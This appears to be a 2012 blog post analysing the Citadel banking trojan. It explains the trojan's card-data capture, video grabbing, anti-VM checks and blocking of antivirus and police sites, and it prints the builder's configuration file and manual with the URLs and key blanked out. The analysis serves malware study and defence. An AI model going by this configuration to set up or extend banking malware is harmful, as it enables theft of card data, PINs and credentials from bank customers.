martes, 18 de septiembre de 2012

Config file troyan Citadel Builder

This document presents the config file used for Citadel troyan, successor of famous Zeus banker Troyan that is used to create the malicious binary that will infect users and will communicate with the server that host the criminal infrastructure.

Among all the new features of this new version underlines its modular configuration depending on the modules that have been purchased on the black market.

One of these modules is the "CardSwipe" whose purpose is to capture all confidential data from credit cards to operate with them fraudulently.

In this config file criminals have this option On.

  enable_luhn10_get 1
  enable_luhn10_post 1
It was possible to reproduce the inyection that makes the Troyan on the infected machine and capture the screen that appears on user navigation asking to enter all his confidential data from the credit card when is accessing to Internet banking.

Is noted how troyan request secret PIN number (ATM Pin) and user identification code of social Insurance (SSN), data that is never requested to the customer under any circumstance.

Other configuration parameters allow to capture video footage from the infected computer

use_module_video 0
entry "Video"
    quality 1
    length 500
This is very useful for criminals to capture the screen sequence in real time when the user enters the secret codes of transfer authorization and bypass authentication systems based on virtual keyboard.

Another commands also let Citadel to capture data sent through the Chrome browser, enable protection against virtual machines to prevent that binary malware could be analyzed, disable sending of cookies and block access to antivirus companies websites and malware protection websites. Redirecting usernavigation to Google homepage ( everytime users try to access them. This doesn't change the hosts file on the infected computer but do it by controlling the computer's DNS cache.

Even also blocks access to webpages of law enforcement and police corps against cybercrime.

 In Next lines it will be showed the configuration of Citadel Builder

;; Default config + updated AV's list (redirect to
;; Citadel Builder
;; SHORT MANUAL BELOW ------------>
;; url_config1 is required!!! url_config2 & url_config3 are optional, you can setup it like a reserve config host.
;; report_software - report to gate about installed firewall,antivirus,software: 1 is enabled
;; disable_antivirus 0/1 - if you bought the MiniAV module, you can switch it off. 0 is enabled.
;; enable_luhn10_get 1/0 - if you bought the CardSwipe module, you can switch it on a GET parsing by LUHN10 algorithm.
;; enable_luhn10_post 1/0 - if you bought the CardSwipe module, you can switch it on a POST parsing by LUHN10 algorithm(
;; use_module_video 1/0 - Do you really want to use video grabber? If no, please switch it off. 1 is enabled.
;; disable_httpgrabber 1/0 - Do you want to switch off Chrome HTTP:// logs grabber? 1 is enabled.
;; package_max_size 50 - logs reports transmission size(KB), stay it as default.
;; timer_autoupdate 10 - Auto-update of exe file, specify time in hours. This option takes exe link from "url_loader" section.
;; antiemulation_enable 0/1 - if you enable it, you can't test it on virtual machines such as VMWare/Virtualbox.
;; disable_cookies 0/1 - if you setup 0, then cookies will send to your gate and .sol files will be deleted.
;; For other information please open the "Personal Manual"
;; <------------------ END OF SHORT MANUAL.

entry "StaticConfig"
  botnet "main"
  timer_config 15 20
  timer_logs  7 20
  timer_stats 10 20
  timer_modules 7 10
  timer_autoupdate 8
  url_config1 "http : //"

  remove_certs 1
;  disable_tcpserver 0
  disable_cookies 0
  disable_httpgrabber 1
  report_software 1
  disable_antivirus 0
  enable_luhn10_get 1
  enable_luhn10_post 1
  antiemulation_enable 0
  encryption_key "*******************************"
  use_module_video 0

entry "DynamicConfig"
  url_loader "http : //"
  url_server "http : //"
  file_webinjects "webinjects.txt"
  entry "AdvancedConfigs"
            "http : //"
  entry "WebFilters"
    "!http : //*"
  entry "WebDataFilters"
    ;"http : //*" "passw;login"
  entry "WebFakes"
    ;"http : //" "http : //" "GP" "" ""
  entry "DnsFilters"
  entry "CmdList"
    "net view"
   entry "Keylogger"
    processes "calc___.exe"
    time 1
  entry "Video"
    quality 1
    length 500

No hay comentarios:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.